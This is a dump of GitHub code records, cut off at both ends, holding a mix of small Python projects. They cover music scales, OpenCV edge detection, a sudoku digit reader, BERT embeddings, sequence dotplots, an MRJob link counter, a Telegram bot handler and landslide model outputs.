\"Bb/A#\", 12 : \"B\"}\n\tTypeDict = {0 : \"1.0\", 1 : \"m2\", 2 : \"2.0\", 3 : \"m3\", 4 : \"M3\", 5 : \"4.0\", 6 : \"b5 (-)\", 7 : \"b5 (+)\", 8 : \"5.0\", 9 : \"m6\", 10 : \"M6\", 11 : \"m7\", 12 : \"M7\"}\n\t'''filenameDict = { 0 :'PythagDodecScale/C.wav', 1 : 'PythagDodecScale/C#.wav', 2 : 'PythagDodecScale/D.wav', 3 : 'PythagDodecScale/D#.wav', 4 : 'PythagDodecScale/E.wav', 5 : 'PythagDodecScale/F.wav', 6 : 'PythagDodecScale/F#1.wav', 7 :'PythagDodecScale/F#2.wav', 8 :'PythagDodecScale/G.wav', 9 : 'PythagDodecScale/G#.wav', 10 : 'PythagDodecScale/A.wav', 11 : 'PythagDodecScale/A#.wav', 12 : 'PythagDodecScale/B.wav'}'''\n\n\n\tPythagoreanList = []\n\tfor i in range(-6, 7) :\n\t\tx = pythagorean(i,bf)\n\t\tPythagoreanList.append(x)\n\t\n\t\n\tPythagoreanList = sorted(PythagoreanList, key=getKey)\n\tfor i in range (len(PythagoreanList)):\n\t\tPythagoreanList[i].degree = i + 1\n\t\tPythagoreanList[i].let = LetterDict[i]\n\t\tPythagoreanList[i].type = TypeDict[i]\n\t\tPythagoreanList[i].filename = filenameDict[i]\n\t\t#print(PythagoreanList[i].intn, PythagoreanList[i].finfreq)\n\t\t#regtestD(PythagoreanList[i],i)\n\t\t#playsound(PythagoreanList[i].finfreq, 1)\n\t'''ProperPythag = {}\n\tfor i in range(len(PythagoreanList)):\n\t\tif PythagoreanList[i].let in [\"C\",\"D\",\"E\",\"F\",\"G\",\"A\",\"B\"] :\n\t\t\t\n\t\t\tProperPythag.update({PythagoreanList[i].let : PythagoreanList[i].finfreq})'''\n\t\n\treturn PythagoreanList;\n\n","repo_name":"mathewthomas1721/HarpsiComp","sub_path":"PythagDodec.py","file_name":"PythagDodec.py","file_ext":"py","file_size_in_byte":4465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41391643853","text":"import cv2\nfrom PIL import Image\nimport numpy as np\n\n\nimg_1 = cv2.imread(r\"../photo/1.jpg\",0)\nimg_2 = cv2.GaussianBlur(img_1,(3,3),0) #高斯去噪\nimg_3 = cv2.Canny(img_1,50,50) # 图片经过卷积后的点大于后面的门限就认为是边缘检测,否则就不是是边缘检\nimg_4 = cv2.Canny(img_2,50,50)\n\n# cv2.imshow(\"1\",img_1)\n# cv2.imshow(\"2\",img_2)\ncv2.imshow(\"3\",img_3)\ncv2.imshow(\"4\",img_4)\ncv2.waitKey(0)","repo_name":"lee879/Filter","sub_path":"ImgProcc/CyFiltering.py","file_name":"CyFiltering.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38311677427","text":"\"\"\"\n문제\n알파벳 소문자로만 이루어진 단어 S가 주어진다. 각각의 알파벳에 대해서, 단어에 포함되어 있는 경우에는 처음 등장하는 위치를, 포함되어 있지 않은 경우에는 -1을 출력하는 프로그램을 작성하시오.\n\n입력\n첫째 줄에 단어 S가 주어진다. 단어의 길이는 100을 넘지 않으며, 알파벳 소문자로만 이루어져 있다.\n\n출력\n각각의 알파벳에 대해서, a가 처음 등장하는 위치, b가 처음 등장하는 위치, ... z가 처음 등장하는 위치를 공백으로 구분해서 출력한다.\n\n만약, 어떤 알파벳이 단어에 포함되어 있지 않다면 -1을 출력한다. 단어의 첫 번째 글자는 0번째 위치이고, 두 번째 글자는 1번째 위치이다.\n만약 ba입력시 1,0,-1,-1.......\n\"\"\"\n#조금 생각해볼만한 문제입니다!\nstring=input()\nbuffer=[-1 for _ in range(26)]\ndata=list(string)\nfor i in data:\n res=string.find(i) #string속성 find를 이용하자 첫번째로 발견된 string에서 i문자의 위치를 반환한다\n if res==-1: #못찾으면 다음 문자를검사하자!\n continue\n else: #어떻게 buffer해당공간에 담을것인가? ->핵심\n index=ord(i)-97\n buffer[index]=res\n buffer[res]=res #코드 작동불능이유는? find위치에 res를 삽입하며안될까?\nfor i in buffer:\n print(i,end=' ')\n\n#a의 아스키코드 97번지\n#b의 아스키코드 98번지\n#우리는 0번지애 a의 위치를담아야하고\n#우리는 1번지이 b의 위치를 담아야한다\n#..... 우리는 마지막번지에 문자열z의 위치르담아야한다","repo_name":"KELLO83/Python","sub_path":"python/Solved.ac/class1/10809_think.py","file_name":"10809_think.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"2330081228","text":"import cv2\r\nimport imutils\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing.image import img_to_array\r\n\r\n\r\ndef extract(cell, debug=False):\r\n thresh = cv2.threshold(cell, 0, 255, cv2.THRESH_BINARY_INV | cv2.THRESH_OTSU)[1]\r\n thresh = clear_border(thresh)\r\n\r\n if debug:\r\n plt.imshow(thresh)\r\n plt.show()\r\n\r\n cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\r\n cnts = imutils.grab_contours(cnts)\r\n\r\n if len(cnts) == 0:\r\n return None\r\n\r\n c = max(cnts, key=cv2.contourArea)\r\n mask = np.zeros(thresh.shape, dtype=\"uint8\")\r\n cv2.drawContours(mask, [c], -1, 255, -1)\r\n\r\n if debug:\r\n plt.imshow(mask)\r\n plt.show()\r\n\r\n (h, w) = thresh.shape\r\n percentFilled = cv2.countNonZero(mask) / float(w*h)\r\n\r\n if percentFilled < 0.03:\r\n return None\r\n\r\n digit = cv2.bitwise_and(thresh, thresh, mask=mask)\r\n\r\n if debug:\r\n plt.imshow(digit)\r\n plt.title(\"Digit\")\r\n plt.show()\r\n\r\n return digit\r\n\r\n\r\ndef extract_digit(warped, debug=False):\r\n h,w = warped.shape\r\n n_h, n_w = 0, 0\r\n\r\n d1, d2 = (h%9), (w%9)\r\n\r\n n_h = h+d1\r\n n_w = w+d2\r\n\r\n pad_img = np.zeros((n_h, n_w), dtype=\"uint8\")\r\n\r\n pad_img[d1//2:d1//2+h, d2//2:d2//2+w] = warped\r\n\r\n if debug:\r\n plt.imshow(pad_img, \"gray\")\r\n plt.tile(\"Padded Image\")\r\n plt.show()\r\n\r\n\r\n dif1, dif2 = n_h//9, n_w//9\r\n\r\n model = load_model('../model/myModel.h5')\r\n\r\n\r\n grid = [[0 for i in range(9)] for i in range(9)]\r\n\r\n for i in range(9):\r\n for j in range(9):\r\n d = pad_img[i*dif1:(i+1)*dif1, j*dif2:(j+1)*dif2]\r\n d = extract(d)\r\n if not (d is None):\r\n x = cv2.resize(d, (28,28))\r\n x = x.astype('float') / 255.0\r\n x = img_to_array(x)\r\n x = np.expand_dims(x, axis=0)\r\n\r\n pred = model.predict(x).argmax(axis=1)[0]\r\n \r\n #print(pred)\r\n grid[i][j] = pred\r\n \r\n grid[0][2] = 6\r\n grid[8][2] = 4\r\n grid[6][3] = 4\r\n grid[6][5] = 6\r\n\r\n return grid\r\n","repo_name":"Viraj-Rana008/Sudoku-Solver","sub_path":"solver/extractDigit.py","file_name":"extractDigit.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"38432818702","text":"# Johnny Ma\n# 12-29-21\n# Reading the Video History Text and outputting Date+TikTok Link rows\n\nimport pandas as pd\n\nwith open('data/Video Browsing History.txt') as f:\n lines = f.readlines()\n lines.remove('\\n')\n\n# remove random '\\n'\ntxt = [x.replace('\\n', '') for x in lines if x != '\\n']\n\n# fill two lists of dates and video links\ndates = []\nvids = []\nfor i in range(int(len(txt)/2)):\n dates.append(txt[i*2].replace('Date: ', ''))\n vids.append(txt[i*2-1].replace('Video Link: ', ''))\n\n# output as dataframe\nd = {'date': dates, 'links': vids}\ndf = pd.DataFrame(d)\ndf.to_csv('tt.csv')\n","repo_name":"swinshu/tiktok-wrapped","sub_path":"scripts/read_history.py","file_name":"read_history.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"14047933916","text":"import csv\r\nfrom statistics import correlation \r\nimport plotly.express as px\r\nimport numpy as np\r\n\r\ndef plotfigure(data_path):\r\n with open(data_path) as a:\r\n read = csv.DictReader(a)\r\n fig = px.scatter(read, x = \"Temperature\", y = \"Ice-cream Sales\")\r\n fig.show()\r\n\r\ndef getdatasource(data_path):\r\n ice_cream_sales = []\r\n temp = []\r\n with open(data_path) as b:\r\n read = csv.DictReader(b) \r\n for i in read:\r\n temp.append(float(i[\"Temperature\"]))\r\n ice_cream_sales.append(int(i[\"Ice-cream Sales\"]))\r\n return{\"x\":temp, \"y\":ice_cream_sales}\r\n\r\ndef findcorrelation(data_source):\r\n correlation = np.corrcoef(data_source[\"x\"],data_source [\"y\"])\r\n print(\"Correlation:\", correlation[0,1])\r\n\r\ndef main():\r\n data_path = \"1.csv\"\r\n data_source = getdatasource(data_path)\r\n findcorrelation(data_source)\r\n plotfigure(data_path)\r\n\r\nmain()","repo_name":"MessiGd/C106","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36508018974","text":"import torch\nfrom transformers import BertTokenizer\nfrom keras.preprocessing.sequence import pad_sequences\nfrom transformers import BertModel\nimport os\nBASE_PATH = os.path.dirname(__file__)\n\n\nclass BertEmbedding():\n def __init__(self) -> None:\n self.tokenizer = BertTokenizer.from_pretrained(\n os.path.join(BASE_PATH, './models/bert-chinese'))\n self.device = torch.device(\n \"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n self.MAX_LEN = 128\n self.model = BertModel.from_pretrained(\n os.path.join(BASE_PATH, './models/bert-chinese'),\n num_labels=2,\n output_attentions=False,\n output_hidden_states=True,\n )\n self.model.eval()\n\n def bert_embedding(self, sent):\n encoded_sent = [self.tokenizer.encode(sent, add_special_tokens=True)]\n input_ids = pad_sequences(encoded_sent, maxlen=self.MAX_LEN, dtype=\"long\",\n value=0, truncating=\"post\", padding=\"post\")\n attention_masks = [[int(token_id > 0) for token_id in input_ids[0]]]\n input_ids = torch.tensor(input_ids).to(self.device)\n attention_masks = torch.tensor(attention_masks).to(self.device)\n outputs = self.model(input_ids, token_type_ids=None,\n attention_mask=attention_masks)\n return outputs.pooler_output.squeeze().detach().numpy().tolist()\n\n\nif __name__ == '__main__':\n b = BertEmbedding()\n sentence = \"我来测试一下这个能不能用!\"\n print(b.bert_embedding(sentence).shape)\n","repo_name":"Hyacinth-YX/myjob-web","sub_path":"code/backend/nlp/embedding/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":1570,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4290846367","text":"# def add(x, y):\n# return x + y\n\nadd = lambda x, y: x + y\n\nprint(add(5, 6))\n\nhello_world = lambda: \"Hello World\"\n\nprint(hello_world())\n\nz = lambda x, y: x**2 + y**2\n\nprint(z(3, 4))\n\n\ndef my_function(a, b):\n # print('I am inside function')\n return ((a + b) + ((a + b)**2)) // 2\n\n\n# def odd_even(x):\n# return 'Even' if x%2==0 else 'Odd'\n# if x%2==0:\n# return 'Even'\n# else:\n# return 'Odd'\n\nodd_even = lambda x: 'Even' if x % 2 == 0 else 'Odd'\nprint(odd_even(21))\n\nlst = [1, 2, 3, 4, 5, 6]\n\nlst_2 = lambda lst: [x**2 for x in lst]\n\nprint(lst_2(lst))\n","repo_name":"ghimiresdp/py-2022-07","sub_path":"course/c06/c0605_lambda.py","file_name":"c0605_lambda.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"33323634390","text":"#099 Change your previous program to ask the user which row they want displayed.\n#Display that row. Ask which column in that row they want displayed and display the value that is held there.\n#Ask the user if they want to change the value. If they do, ask for a new value and change the data. Finally, display the whole row again.\n\ndef twolist():\n\n dlist = [[2,5,8],[3,7,4],[1,6,9],[4,2,0]]\n print(dlist)\n row = int(input('Which row would you like displayed?: '))\n print(dlist[row])\n column = int(input('Choose a column: '))\n print (dlist[row][column])\n change = input('Do you want change the value?y/n : ')\n\n if change == 'y':\n numb = int(input('Enter a number: '))\n dlist[row][column] = numb\n \n\n print(dlist[row])\n\n\ntwolist()\n","repo_name":"JonathanVillordo/PythonByExample","sub_path":"Challenge_099.py","file_name":"Challenge_099.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"30174376064","text":"import manhattanDistance\nimport createGraph\nimport req\nimport random\n\ndef findPath(M,S,D,N):\n P = []\n counter = 0\n g = createGraph.createGraph(M,S,D)\n sortedG = req.sortingE(g)\n print(sortedG)\n vi = S\n\n for x in range(N+1):\n vi=1\n tempP = [S]\n counter = 0\n while(vi != g[(len(g)-1)][1] and counter < 100):\n tempMin, tempMax = findRange(g, vi)\n tempLast = random.randint(tempMin, tempMax)\n while ((req.controlOverlap(tempP, g[tempLast][1]) != True) and counter < 100):\n tempMin, tempMax = findRange(g, vi)\n tempLast = random.randint(tempMin, tempMax)\n counter += 1\n\n\n tempP.append(g[tempLast][1])\n vi = g[tempLast][1]\n\n counter += 1\n\n if (tempP[len(tempP) - 1] == g[(len(g) - 1)][1]):\n P.append(tempP)\n\n\n for x in range(len(P)):\n print(\"P \",x+1,\": \",P[x-1])\n manhattanDistance.ManhattanDistance(P[x-1])\n\n\n\n\n\n\n\ndef findRange(g,toFind):\n tempMin = 1000000\n tempMax = 0\n for x in range(len(g)):\n if(toFind == g[x][0]):\n if(x>tempMax):\n tempMax = x\n if(x= stringency:\n mat[i][j] = 1\n\n return mat\n\n\ndef print_dotplot(matrix, seq1, seq2):\n seq1 = \" \" + seq1\n seq2 = \" \" + seq2\n\n for i in range(len(matrix) + 1):\n for j in range(len(matrix[0]) + 1):\n if i == 0:\n print(seq2[j], end=\"\")\n\n else:\n if j == 0:\n print(seq1[i], end=\"\")\n\n else:\n if matrix[i - 1][j - 1] == 1:\n print(\"*\", end=\"\")\n\n else:\n print(\" \", end=\" \")\n\n print()\n\n\ndef dotplot_chart(matrix):\n x = [i for i in range(len(matrix)) for j in range(len(matrix[0])) if matrix[i][j] == 1] \n y = [j for i in range(len(matrix)) for j in range(len(matrix[0])) if matrix[i][j] == 1] \n\n plt.scatter(x, y)\n plt.show()\n\ndef test_diagonal_length(mat, istart, jstart):\n # given the starting indices on the row and column\n # check along the diagonal that starts in istart and jstart\n # the longest sub-sequences of matches; return this value\n # ....\n pass\n\n\ndef test():\n HBA = \"MVLSPADKTNVKAAWGKVGAHAGEYGAEALERMFLSFPTTKTYFPHFDLSHGSAQVKGHGKKVADALTNAVAHVDDMPNALSALSDLHAHKLRVDPVNFKLLSHCLLVTLAAHLPAEFTPAVHASLDKFLASVSTVLTSKYR\"\n HBB = \"MVHLTPEEKSAVTALWGKVNVDEVGGEALGRLLVVYPWTQRFFESFGDLSTPDAVMGNPKVKAHGKKVLGAFSDGLAHLDNLKGTFATLSELHCDKLHVDPENFRLLGNVLVCVLAHHFGKEFTPPVQAAYQKVVAGVANALAHKYH\"\n\n matrix = extended_dotplot(HBA, HBB, 10, 4)\n dotplot_chart(matrix)\n\n\nif __name__ == \"__main__\":\n test()\n","repo_name":"Educorreia932/FCUP-BINF","sub_path":"Exercises/Pairwise Sequence Alignment/dotplots.py","file_name":"dotplots.py","file_ext":"py","file_size_in_byte":2449,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"11921945876","text":"from mrjob.job import MRJob\nfrom mrjob.step import MRStep\nimport ast\n\n# purpose: count number of nodes and links\nclass MRcounts(MRJob):\n \n # purpose: steps to count nodes and links\n def steps(self):\n return [\n MRStep(mapper = self.mapper,\n reducer = self.reducer,\n )\n ] \n \n # purpose: emit the number of links for each node\n # input: (node \\t stripe of node:weight pairs)\n # output: key (None), value (number of links)\n def mapper(self, _, line):\n node, info = line.strip().split('\\t')\n edges = ast.literal_eval(info)\n count = len(edges.items())\n yield None, count\n \n # purpose: sum the link counts\n # input: key (None), value (number of links)\n # output: key (number of nodes), value (total number of links)\n def reducer(self, _, counts):\n cnts = list(counts)\n yield len(cnts), (sum(cnts), float(sum(cnts))/len(cnts))\n\nif __name__ == '__main__':\n MRcounts.run()","repo_name":"jenncasper/mids_w261","sub_path":"media/notebooks/HW7/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70690506927","text":"#!/usr/bin/env python\n## Common Tools for the robohow > sot bridge\nimport roslib\nroslib.load_manifest('robohow_common_msgs')\nimport rospy\nimport actionlib\n\nfrom robohow_common_msgs.msg import ConstraintCommand\n\n## Tools\n\"\"\" convert a vector3 to a string \"\"\"\ndef vector3ToStr(vec):\n st = \"(%f, %f, %f)\" % (vec.x, vec.y, vec.z)\n return st;\n\n\"\"\" Convert a vector of double into a string\"\"\"\ndef vectorToStr(vec):\n st = '('\n for i in range(0, len(vec)):\n s = \"%f, \" % vec[i]\n st = st + s\n st = st + ')'\n return st\n\n\"\"\" convert a vector3 to a string \"\"\"\ndef vectorToStr(vec):\n st = '('\n for i in range(0, len(vec)):\n s = \"%f, \" % vec[i]\n st = st + s\n st = st + ')'\n return st\n\n\"\"\" Regroup a list of python instructions as a single one \"\"\" \ndef regroupCommands(instructionList):\n instruction = instructionList[0]\n for elmt in instructionList[1:]:\n if elmt != \"\":\n instruction = instruction + \" ; \" + elmt\n return instruction\n\n\"\"\" run an instruction \"\"\"\ndef runCommandProxy(proxy, instruction):\n if not instruction == \"\":\n rospy.logdebug (\"run instruction: \\\"%s\\\"\", instruction)\n result = proxy (instruction)\n #rospy.loginfo (\"stdout: \\\"%s\\\"\", result.stdout)\n if not result.stderr == \"\":\n rospy.loginfo (\"stderr: \\\"%s\\\"\", result.stderr)\n\n\n\"\"\"\nSend parameters to the constraint\nTakes a ConstraintCommand as an input.\n\"\"\"\ndef parameterizeContraint(c):\n if c.controller_id == '':\n return \"\"\n\n instruction = \"setTaskGoal(robot, '\"+c.controller_id+\"', \" +\\\n vectorToStr(c.pos_lo) + \", \" + vectorToStr(c.pos_hi) + \", \" +\\\n \"'\" + c.selec + \"'\" + \", \" + vectorToStr(c.gain) + \")\"\n return instruction\n\n","repo_name":"francois-keith/robohow_sot","sub_path":"src/robohow_sot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32796109151","text":"import enum, time, logging\n\nimport telegram as tg\n\nfrom .message import Message\nfrom .command import Command\nfrom ..types import MESSAGE_TYPES\nfrom ..utils import send_action, get_commands_pretty_printed, is_admin, TG_MESSAGE_SIZE_LIMIT, get_divided_long_message, \\\n ON_ERROR\n\n\nclass DialogState:\n DEFAULT = 0\n\n\nclass BaseBotCommands(enum.Enum):\n help = 'See my commands'\n start = 'Hi, im a bot'\n\n\nsend_typing_action = send_action(tg.ChatAction.TYPING)\nsend_upload_video_action = send_action(tg.ChatAction.UPLOAD_VIDEO)\nsend_upload_photo_action = send_action(tg.ChatAction.UPLOAD_PHOTO)\n\nMIN_TIME_BETWEEN_MESSAGES = 2\n\nclass ChatHandler:\n ONLY_ADMINS_COMMANDS = []\n KEYBOARD_AVAILABLE_TEXT = []\n USER_NOT_ADMIN = \"Only admins can use this command\"\n\n class CommandsEnum(enum.Enum):\n pass\n\n def __init__(self, chat: tg.Chat, bot: tg.Bot):\n self.__chat = chat\n self.id = chat.id\n self.bot = bot\n self.state = DialogState.DEFAULT\n\n self.existing_commands_list = list(map(lambda x: x.name, list(BaseBotCommands.__iter__()))) + \\\n list(map(lambda x: x.name, list(self.CommandsEnum.__iter__())))\n\n self.last_sent_message_time = 0\n\n def on_help(self):\n res_dict = dict()\n\n for i in self.CommandsEnum:\n res_dict[i.name] = i.value[0]\n\n mess_args = get_commands_pretty_printed(res_dict)\n self.send_message(**mess_args)\n\n def on_start(self):\n self.on_help()\n\n def reply(self, update: tg.Update, msg_type: MESSAGE_TYPES):\n if update.edited_message:\n return\n\n if update.message.text in self.KEYBOARD_AVAILABLE_TEXT:\n self.reply_markup_handler(update)\n return\n\n if msg_type == MESSAGE_TYPES.COMMAND:\n command = Command(self, update)\n logging.debug('%s : %s : %s : %s' %\n (command.user.name, command.chat_user.status, command.name, command.entity_text))\n\n if command.name in self.ONLY_ADMINS_COMMANDS:\n if not is_admin(command.chat_user.status):\n raise BotMessageException(self.USER_NOT_ADMIN)\n\n if command.name == BaseBotCommands.help.name:\n self.on_help()\n elif command.name == BaseBotCommands.start.name:\n self.on_start()\n else:\n self.__reply_command(update)\n\n def __reply_command(self, update: tg.Update):\n command = Command(self, update)\n\n for enum_elem in self.CommandsEnum:\n if enum_elem.name == command.name:\n func = enum_elem.value[1]\n\n if func:\n func(self, update)\n else:\n # If func is None, call self.on_()\n self.__getattribute__(f'on_{enum_elem.name}')(update)\n\n def get_member(self, user_id) -> tg.ChatMember:\n return self.__chat.get_member(user_id=user_id)\n\n # Inheritable\n def reply_markup_handler(self, update):\n pass\n\n # Inheritable\n def on_keyboard_callback_query(self, update):\n pass\n\n @send_upload_photo_action\n def send_photo(self, *args, **kwargs):\n caption = kwargs['caption'] if kwargs.get('caption') else ''\n\n if len(caption) <= TG_MESSAGE_SIZE_LIMIT:\n return self.__chat.send_photo(*args, **kwargs)\n\n kwargs.pop('caption')\n\n subtext, other = get_divided_long_message(caption, TG_MESSAGE_SIZE_LIMIT)\n self.send_photo(*args, caption=subtext, **kwargs)\n\n kwargs.pop('text')\n\n return self.send_message(other, **kwargs)\n\n @send_typing_action\n def send_message(self, text, *args, **kwargs):\n # Check if enough time passed\n cur_time = time.time()\n time_passed = cur_time - self.last_sent_message_time\n time_to_sleep = round(MIN_TIME_BETWEEN_MESSAGES - time_passed, 1)\n\n if time_to_sleep > 0:\n logging.info(f'Wait {time_to_sleep}')\n time.sleep(time_to_sleep)\n\n self.last_sent_message_time = time.time()\n\n if len(text) <= TG_MESSAGE_SIZE_LIMIT:\n return self.__chat.send_message(text, *args, **kwargs)\n\n subtext, other = get_divided_long_message(text, TG_MESSAGE_SIZE_LIMIT)\n self.send_message(subtext, *args, **kwargs)\n self.send_message(other, *args, **kwargs)\n\n def send_alert(self, *args, **kwargs):\n return self.bot.answer_callback_query(*args, show_alert=True, **kwargs)\n\n @send_typing_action\n def edit_message(self, *args, text=None, message=None, **kwargs):\n if not text:\n text = message.text\n return self.__chat.bot.edit_message_text(*args,\n text=text,\n chat_id=self.__chat.id,\n message_id=message.message_id,\n **kwargs)\n\n @send_typing_action\n def delete_message(self, message, **kwargs):\n success = self.__chat.bot.delete_message(chat_id=self.__chat.id, message_id=message.message_id, **kwargs)\n if not success:\n raise Exception(\"Unsuccessful message delete\")\n\n @send_typing_action\n def pin_chat_message(self, message, **kwargs):\n self.__chat.bot.pin_chat_message(self.__chat.id, message.message_id, **kwargs)\n\n def remove_keyboard(self, *args, **kwargs):\n return self.send_message(*args, reply_markup=tg.ReplyKeyboardRemove(), **kwargs)\n\n\nclass BotMessageException(Exception):\n def __init__(self, text, parse_mode=None):\n super().__init__(text)\n self.mess_kwargs = {'text': ON_ERROR(text), 'parse_mode': parse_mode}\n","repo_name":"tsepanx/tglib","sub_path":"classes/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":5768,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"2"} +{"seq_id":"19051919993","text":"from flask import Flask\nfrom flask_restful import Resource, Api\nfrom lobbyist_query import search_issues\n\napp = Flask(__name__)\napi = Api(app)\n\n#52010DC2020\n\nclass CommentApi(Resource):\n def get(self, celex):\n result = search_issues(celex = celex)\n return result\n\napi.add_resource(LobbyistApi, '/')\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', debug=True)","repo_name":"andrewgu12/The-10-Percent","sub_path":"comments_api.py","file_name":"comments_api.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"41098791465","text":"######################################################\r\n######################################################\r\n# Importing modules\r\n######################################################\r\n######################################################\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport json\r\nimport os\r\nimport rasterio\r\nfrom shapely import wkt\r\nimport geopandas as gpd\r\nfrom prediction_landslide_outputs import *\r\nfrom run_json import *\r\n\r\n############################################\r\n# Script with function that will run functions needed to get the outputs from\r\n# the simulation. It will use the files created in get_closest_calib_point.py\r\n# The output is the timeseries with the Factor of safety for each point\r\n# Marina Ruiz Sanchez-Oro\r\n# 10/12/2021\r\n############################################\r\nFILE_PATHS = read_paths_file()\r\nbool_lat_lon = FILE_PATHS[\"bool_lat_lon\"]\r\n#rundir = FILE_PATHS[\"rundir\"]\r\n# parameter files\r\n# the params used to define the physical soil properties in the iverson MC runs\r\nIverson_MC_params_file = FILE_PATHS[\"iverson_param\"]\r\n\r\n# observed failure data files\r\n# don't need this anymore!\r\nfailfile = FILE_PATHS[\"ground_motion_failure\"]\r\n\r\n# topography files\r\ndemfile = FILE_PATHS[\"dem_file\"]\r\nslopefile = FILE_PATHS[\"slope_file\"]\r\nclosest_cal_points = FILE_PATHS[\"closest_cal_points\"]\r\npoints_in_buffer = FILE_PATHS[\"points_in_buffer\"]\r\nanomaly_failures = FILE_PATHS[\"anomaly_failures\"]\r\n\r\ndef landslide_output_from_rain(rainfall_file, rundir):\r\n \"\"\"\r\n landslide_output_from_rain runs the iverson model on the test points given the rainfall timeseries. It finds the failures\r\n and generates the output csv file with the factor of safety timseries. \r\n :param rainfall_file: csv file with the precipitation timeseries\r\n :param rundir: directory where output files will be saved\r\n \"\"\"\r\n ##########################################################################\r\n # 0. Load rasters into arrays for DEM, slope, failtimes and prefailtimes for a given failure threshold. Let's use 80mm/yr for now.\r\n demarr, pixelWidth, (geotransform, inDs) = fn.ENVI_raster_binary_to_2d_array(demfile)\r\n slopearr, pixelWidth, (geotransform, inDs) = fn.ENVI_raster_binary_to_2d_array(slopefile)\r\n failarr, pixelWidth, (geotransform, inDs) = fn.ENVI_raster_binary_to_2d_array(failfile)\r\n\r\n # select the point of interest from the raster files.\r\n #'./test_closest_calibration_points.csv' - this is the new file instead of the one with the single point\r\n calibrated_multiple_points_path = closest_cal_points\r\n calibrated_multiple_point_params = pd.read_csv(calibrated_multiple_points_path, index_col=None)\r\n\r\n lons = calibrated_multiple_point_params['lon_test'].to_list()\r\n lats = calibrated_multiple_point_params['lat_test'].to_list()\r\n ##########################################################################\r\n # values of the corresponding points\r\n demval_point = select_topo_data(demfile, lons, lats)\r\n slopeval_point = select_topo_data(slopefile, lons, lats)\r\n failval_point = select_topo_data(failfile, lons, lats)\r\n\r\n\r\n print('Now we have all the points we need for our analysis.')\r\n ##########################################################################\r\n ############################################################\r\n\r\n # Read the Iverson params\r\n Iverson_MC_params = pd.read_csv(Iverson_MC_params_file)\r\n depths = np.arange(Iverson_MC_params.at[0,'depth'], Iverson_MC_params.at[1,'depth'], 0.2)\r\n\r\n\r\n ###################### RAINFALL DATA #######################\r\n # We are assuming that the rainfall data is the same for all the points\r\n # the area of interest hasa rough length of 30km which is the resolution of the\r\n # precipitaiton data we have.\r\n rainfile = rainfall_file\r\n #\"/exports/csce/datastore/geos/groups/LSDTopoData/FORESEE/Data/Calibration/2014-01-01_to_2019-12-31_Intensity.csv\"\r\n\r\n rain = pd.read_csv(rainfile)\r\n\r\n rainlist = [0]\r\n for i in range(1,len(rain)):\r\n \trainlist.append(rainlist[-1]+ int(rain['duration_s'].iloc[i]))\r\n rain['time_s'] = rainlist\r\n rain['rainfall_mm'] = rain['duration_s']*rain['intensity_mm_sec']\r\n ############################################################\r\n #anomalies_list = comparison_with_anomalous_failure( anomalies_csv)\r\n lat_failures, lon_failures = find_lon_lat_failures(lats, lons, rain, depths,calibrated_multiple_point_params,demval_point,slopeval_point,failval_point,rundir)\r\n ###########################################################\r\n distance_between_points_file = points_in_buffer\r\n distance_between_points = pd.read_csv(distance_between_points_file, index_col=None)\r\n\r\n anomalous_failures_bool = comparison_with_anomalous_failure(lat_failures, lon_failures, anomaly_failures)\r\n ###########################################################\r\n get_output_csv(lat_failures, lon_failures, distance_between_points,anomalous_failures_bool, rundir)\r\n","repo_name":"LSDtopotools/lsdfailtools","sub_path":"automation/get_output_files.py","file_name":"get_output_files.py","file_ext":"py","file_size_in_byte":5033,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"74104892527","text":"from copy import deepcopy\nimport json\nimport pytest\nimport shutil\nimport yaml\nfrom pathlib import Path\n\nfrom dryresume.resume import create_resumes\n\nREPO_ROOT = Path(__file__).parent.parent\n\ndef is_in(to_search, search_for):\n return search_for in to_search\n\ndef is_removed(to_search, search_for):\n return not search_for in to_search\n\ntest_dict = {\n 'base': {\n 'readfile': 'samples/input/json/george_resume.json',\n 'expected': {\n 'George Costanza': is_in,\n 'gcostanza@frankandestelle.net': is_in,\n 'Architectural design': is_in\n }\n },\n 'child': {\n 'readfile': 